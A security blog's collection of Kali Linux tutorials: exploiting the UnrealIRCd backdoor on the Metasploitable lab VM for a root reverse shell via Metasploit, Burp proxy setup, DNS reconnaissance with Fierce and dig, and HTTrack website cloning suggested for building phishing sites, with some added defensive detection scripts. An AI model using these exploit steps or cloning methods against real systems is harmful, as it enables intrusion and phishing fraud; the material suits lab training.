
Showing posts with label Hack Tools. Show all posts

Saturday, October 24, 2015

IRC Exploit tutorial to hack into ROOT shell : Metasploitable 2 - Kali Linux 2

1. root is the user name that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser. For hackers and cyber criminals, getting to a root shell is the key to start doing the undesired, and there are thousands of ways to get there via various exploits, tricks and hacks. In this post I give a step-by-step guide with screenshots to get to "root" on a Metasploitable machine from a Kali Linux machine. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This should come in handy for beginners in this domain. I have two virtual machines for this test: one Metasploitable and one Kali Linux.

Setting up the Virtual Machines

Firstly, we need to configure the host-only adapter settings in VirtualBox as shown below.

Click on Network > Host-only Networks tab and then "Add host-only adapter" as shown below:
Edit the settings of the host-only adapter.
Configure the IP address to any range you desire. I have set it up as seen below:
Now I have configured my Kali VM with the following settings:
The Metasploitable machine is configured as seen below:
Checking PING between the two machines


Playing with the setup : Running tools and exploits

The first thing to do is to run an nmap scan and see what services are running. At the terminal window on your Kali system, type the following:

nmap -sS -Pn

In our case the Metasploitable machine IP is 192.168.56.103. The "-sS" switch in the above command asks nmap to perform a stealth (SYN) scan. The "-Pn" tells nmap not to ping first to find out which systems are up.
Running nmap with the "-A" switch will also perform OS detection and try to determine service versions. Running the command will give us screen output something like that shown below:

nmap -sS -Pn -A 192.168.56.103
There are a lot of services running, as seen above, but the one we are interested in is the Unreal Internet Relay Chat (IRC) daemon highlighted below. In the screenshot we see the software version, in this case "Unreal IRC 3.2.8.1". Our next step is to use Metasploit to exploit the vulnerability.
Go to the Kali terminal and type msfconsole to get the screen seen below:
The basic sequence of exploiting a vulnerability is as follows:
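The version string nmap reports is what a defender should be hunting for too. The script below is an added example (not part of the original post): it parses the XML that "nmap -sS -Pn -A -oX scan.xml <target>" writes and reports every open port running UnrealIRCd 3.2.8.1, the release the exploit module in this post targets. The XML sample is constructed to mirror the Metasploitable services.

```python
"""Flag the backdoored UnrealIRCd 3.2.8.1 build in nmap -A XML output.
Added example, not from the original post; the scan XML below is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample mirroring the Metasploitable services the post scans.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -Pn -A -oX scan.xml 192.168.56.103">
  <host>
    <address addr="192.168.56.103" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="6667">
        <state state="open"/>
        <service name="irc" product="UnrealIRCd" version="3.2.8.1"/>
      </port>
      <port protocol="tcp" portid="6697">
        <state state="closed"/>
        <service name="irc" product="UnrealIRCd" version="3.2.8.1"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""
# Product/version pair that the exploit module used in the post targets.
BACKDOORED_IRC = ("unrealircd", "3.2.8.1")

def open_services(xml_text):
    """Yield (addr, port, product, version) for each open port in the scan."""
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports carry no reachable service
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            yield addr, int(port.get("portid")), product, version

def flag_backdoored_irc(xml_text):
    """Return 'addr:port' for every open UnrealIRCd 3.2.8.1 instance."""
    return [f"{a}:{p}" for a, p, prod, ver in open_services(xml_text)
            if (prod.lower(), ver) == BACKDOORED_IRC]

if __name__ == "__main__":
    for hit in flag_backdoored_irc(SAMPLE_XML):
        print(hit, "runs the backdoored UnrealIRCd release: upgrade or remove it")
```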

- Picking an Exploit
- Setting Exploit Options
- Picking a Payload
- Setting Payload Options
- Running the Exploit
- Connecting to the Remote System

Now at the msf prompt type: use exploit/unix/irc/unreal_ircd_3281_backdoor
Next we need to set RHOST with the following command:

set RHOST 192.168.198.145 (the Metasploitable IP address)
At the msf prompt, type "show payloads" to display all payloads that work with the exploit:
Now we will use the generic reverse shell, which gives us a terminal shell on the target when the exploit finishes. Type the following at the msf prompt:

set payload cmd/unix/reverse
The show options command then lists the current settings:
We see above that LHOST remains to be configured, so we set it now as follows:

Running the show options command again shows the setup configured as desired:
and now the final bullet... simply type exploit at the msf prompt
and here you are... right at the terminal as root
To test it, just make a directory on the victim Metasploitable machine. I made one named anupam, and we see the same in the second terminal window in the screenshot below:
...that's it guys...any questions...most welcome...

Thursday, October 22, 2015

Segmentation fault in Kali Linux 2.0 [solved]

Kali Linux 2.0, the well known penetration testing distro, contains a plethora of digital forensics tools and is widely used by the ethical hacker community across the globe. It comes with over 650 tools pre-installed that help perform tasks like network analysis, ethical hacking, load and crash testing etc. It is powered by Linux kernel 4.0 and has enhanced support for different graphics cards and desktop environments. However, I noticed a small bug when running two regular commands, apt-get update and msfupdate: I used to get the segmentation fault error seen in the screenshot below:


I resolved it by running the following command at the terminal to open the sources.list file:

root@kali:~# leafpad /etc/apt/sources.list

As the file opens, simply select all the existing content in the file and delete it. Then paste the following lines into the file and save:

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
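Editing sources.list by hand is easy to get slightly wrong, and a leftover entry pointing at an old suite is a common cause of apt trouble. The checker below is an added example (not from the original post): it parses the sources.list format (ignoring comments and blank lines, and treating component order as irrelevant) and reports which of the four sana lines above are missing and which entries point at a different suite. The sample file is constructed.

```python
"""Audit a Kali sources.list against the sana entries the post pastes in.
Added example, not from the original post; the sample file below is constructed."""
import re

# The four repository lines the post puts into /etc/apt/sources.list.
EXPECTED = [
    "deb http://http.kali.org/kali sana main non-free contrib",
    "deb http://security.kali.org/kali-security sana/updates main contrib non-free",
    "deb-src http://http.kali.org/kali sana main non-free contrib",
    "deb-src http://security.kali.org/kali-security sana/updates main contrib non-free",
]

# Constructed sample: one stale entry from an older install, two lines missing.
SAMPLE = """\
# Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib   # trailing comment
"""

ENTRY = re.compile(r"^(deb|deb-src)\s+(\S+)\s+(\S+)\s+(.+)$")

def parse_entries(text):
    """Return (type, uri, suite, components) per active line; skip comments/blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip full-line and trailing comments
        if not line:
            continue
        m = ENTRY.match(line)
        if not m:
            raise ValueError(f"malformed sources.list line: {raw!r}")
        kind, uri, suite, comps = m.groups()
        # frozenset: "main non-free contrib" and "main contrib non-free" are the same
        entries.append((kind, uri, suite, frozenset(comps.split())))
    return entries

def audit(text):
    """Report expected entries absent from the file and entries not on a sana suite."""
    have = parse_entries(text)
    want = parse_entries("\n".join(EXPECTED))
    missing = [e for e in want if e not in have]
    wrong_suite = [e for e in have if not e[2].startswith("sana")]
    return {"missing": missing, "wrong_suite": wrong_suite}
```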

and now it should work, just as it did in my case as seen below:



Thursday, October 01, 2015

Burp Suite : Configuring the browser and redirecting traffic

1. See my last post about installing Burp Suite here; now I move ahead to configure your browser so that all HTTP/S requests are redirected through Burp Proxy instead of going straight to the target website. In my case I am configuring Mozilla Firefox with the proxy host address 127.0.0.1 and the proxy port 8080, for both HTTP and HTTPS. Configuring a proxy is more or less the same across major browsers, with minor differences in the interfaces. Below I first give the steps to configure Firefox, followed by screenshots of redirected traffic, both http and https, passing via Burp Suite:

Configuring Mozilla Firefox

- Click Firefox menu and then Preferences.
- In the Advanced options, under the Network tab, click on connection Settings.
- Select Manual proxy configuration.
- Enter the proxy host address as 127.0.0.1 and the proxy port as 8080.
- Select Use this proxy server for all protocols.
- Make sure to remove all exceptions from the No Proxy for field.
- Click OK and close.


2. So now you have a working installation of Burp Suite and your browser is configured to send all requests through it. To test it, go to the browser, enter any http://www.****** site in the address bar and press Enter. If all is well, Burp Proxy should intercept this request. In Burp Suite, go to the Proxy > Intercept tab and verify that the web request is waiting for your approval. Ensure that the Intercept is on button is enabled, then allow the request to pass through Burp by pressing Forward in the Burp Suite interface. Now in the browser you should see the http page you entered in the address bar.

Now try an https site and you are bound to see the warning shown in the screenshot below: a This Connection is Untrusted page. In such a case you have to manually approve the connection by clicking I Understand the Risks, then Add Exception... and Confirm Security Exception. To make sure that Burp Proxy is actually causing the warning, click the certificate status View... and check that the certificate belongs to PortSwigger CA, as seen in the screenshot below; the warning appears because Burp re-signs each site's certificate with its own CA, which the browser does not yet trust.

PortSwigger CA certificate


This setup means that Burp Suite is now ready for use, as traffic is being redirected as configured.

Sunday, August 03, 2014

Fierce Domain Scan by FIERCE @ Kali Linux

1. This post gives a stepped screenshot walkthrough of a relatively unknown but powerful tool known as Fierce. It is a Perl script written by rsnake. Fierce tries multiple techniques to find all the IP addresses and hostnames used by a target; it is meant specifically to locate likely targets both inside and outside a corporate network. A very detailed and easy-to-follow explanation is given at http://ha.ckers.org/fierce/

2. To use Fierce, navigate to Information Gathering | DNS Analysis | Fierce.
Fierce will load into a terminal window as shown in the following screenshot.



DOMAIN INFORMATION GROPER : DIG@Kali LINUX

1. Most high-value targets have a DNS name associated with an application. DNS names make it easier for users to access a particular service and add a layer of professionalism to a system. For example, if you want to access Google for information, you could open a browser and type in 74.125.68.138 or type www.google.com

2. DNS information about a particular target can be extremely useful to a penetration tester, as it lets them map out systems and subdomains. To use dig, open a command prompt and type dig hostname, where hostname is the target domain.

3. Dig lookups show the DNS records for the given host or domain: network address, mail exchanger, name server, host information, arbitrary string and start of authority records. If no server is given, dig uses your operating system's default DNS settings to query the hostname; you can also make dig query a specific DNS server by adding @server to the command. The example in the following screenshot illustrates using dig on http://www.hacklabs.com/

 
4. The -t option selects the record type to query; -t ns returns the authoritative name servers for the zone. We type dig -t ns http://www.hacklabs.com/ in the example in the following screenshot:

5. From the results we see that we have two authoritative DNS servers for the domain http://www.hacklabs.com/; they are ns51.domaincontrol.com and ns51.domaincontrol.com

6. Thanks to the book Web Penetration Testing with Kali Linux by Joseph Muniz and Aamir Lakhani.

HTTrack : Clone a Website@KALI LINUX

1. This post introduces a well known tool to clone a website: HTTrack. It is built into Kali, though older versions may not have it. The purpose of HTTrack is to copy a website; it allows a penetration tester to look at the entire content of a website, all its pages and files, offline and in their own controlled environment. Needless to emphasize the importance and usefulness of having a copy of a website, which could be used to develop fake phishing websites to incorporate in other penetration testing toolsets. To install HTTrack if it is not already built into Kali, open a Terminal window and type the following, as shown in the screenshot:

apt-get install httrack 


2. Firstly we will create a directory to store the copied website. The following screenshot shows a directory named testwebsite created using the mkdir command.

3. To start HTTrack, type httrack in the command window and give the project a name, as shown in the following screenshot:

4. The next step is to select a directory to save the website. The example in the following screenshot shows the folder created in the previous step, /root/testwebsite, used for the directory:

5. Enter the URL of the site you want to capture. The example in the following screenshot shows www.hackershandbook.org. This can be any website. Most attacks use a website accessed by clients from your target, such as popular social media websites or the target's internal websites. Next, two options are presented regarding what you want to do with the captured site. Option 2 is the easiest method, which is to mirror the website with a wizard, as shown in the following screenshot:

6. Next, you can specify if you want to use a proxy to launch the attack. You can also specify what type of files you want to download (the example in the following screenshot shows * for all files). You can also define any command line options or flags you might want to set; the example in the following screenshot shows no additional options. Before httrack runs, it displays the command that it is running. You can use this command in the future if you want to run httrack without going through the wizard again. The following screenshots show httrack cloning www.hackershandbook.org:

7. After you are done cloning the website, navigate to the directory where you saved it. Inside, you will find all your files and web pages, as shown in the following screenshot:
8. Thanks to the book Web Penetration Testing with Kali Linux by Joseph Muniz and Aamir Lakhani.
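The flip side of the cloning walkthrough above is spotting it on the site being copied. The script below is an added example (not from the original post or the book): it reads Apache/nginx combined-format access log lines and flags clients that either announce a site-copying tool in their User-Agent (it assumes HTTrack's default "HTTrack 3.0x" agent string is left unchanged) or fetch an unusually large number of distinct paths. The log lines are constructed; the threshold is a starting point to tune per site.

```python
"""Spot HTTrack-style site cloning in a web server access log.
Added example, not from the original post. Assumes the combined log format and
HTTrack's default User-Agent string; the log lines below are constructed."""
import re
from collections import defaultdict

# client_ip, request path and user-agent from one combined-format line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:[A-Z]+ )?([^" ]*)[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Constructed sample: one ordinary visitor and one mirroring client.
SAMPLE_LOG = """\
203.0.113.9 - - [03/Aug/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
203.0.113.9 - - [03/Aug/2014:10:00:04 +0000] "GET /about.html HTTP/1.1" 200 3100 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
198.51.100.7 - - [03/Aug/2014:10:05:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.7 - - [03/Aug/2014:10:05:00 +0000] "GET /style.css HTTP/1.1" 200 800 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.7 - - [03/Aug/2014:10:05:01 +0000] "GET /about.html HTTP/1.1" 200 3100 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.7 - - [03/Aug/2014:10:05:01 +0000] "GET /logo.png HTTP/1.1" 200 9000 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
198.51.100.7 - - [03/Aug/2014:10:05:02 +0000] "GET /login.html HTTP/1.1" 200 2200 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
"""

MIRROR_AGENTS = ("httrack", "webcopier", "wget")  # substrings of known site-copy tools

def parse(log_text):
    """Yield (ip, path, user_agent) for each line that matches the combined format."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:  # malformed lines are skipped rather than aborting the run
            yield m.group(1), m.group(2), m.group(3)

def find_cloners(log_text, min_paths=5):
    """Return {ip: reason} for clients that look like they are mirroring the site."""
    paths = defaultdict(set)
    agents = defaultdict(set)
    for ip, path, ua in parse(log_text):
        paths[ip].add(path)
        agents[ip].add(ua.lower())
    flagged = {}
    for ip in paths:
        if any(tag in ua for ua in agents[ip] for tag in MIRROR_AGENTS):
            flagged[ip] = "mirroring user-agent"
        elif len(paths[ip]) >= min_paths:  # crude breadth check; tune per site
            flagged[ip] = f"{len(paths[ip])} distinct paths fetched"
    return flagged

if __name__ == "__main__":
    for ip, reason in find_cloners(SAMPLE_LOG).items():
        print(f"{ip}: {reason}")
```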
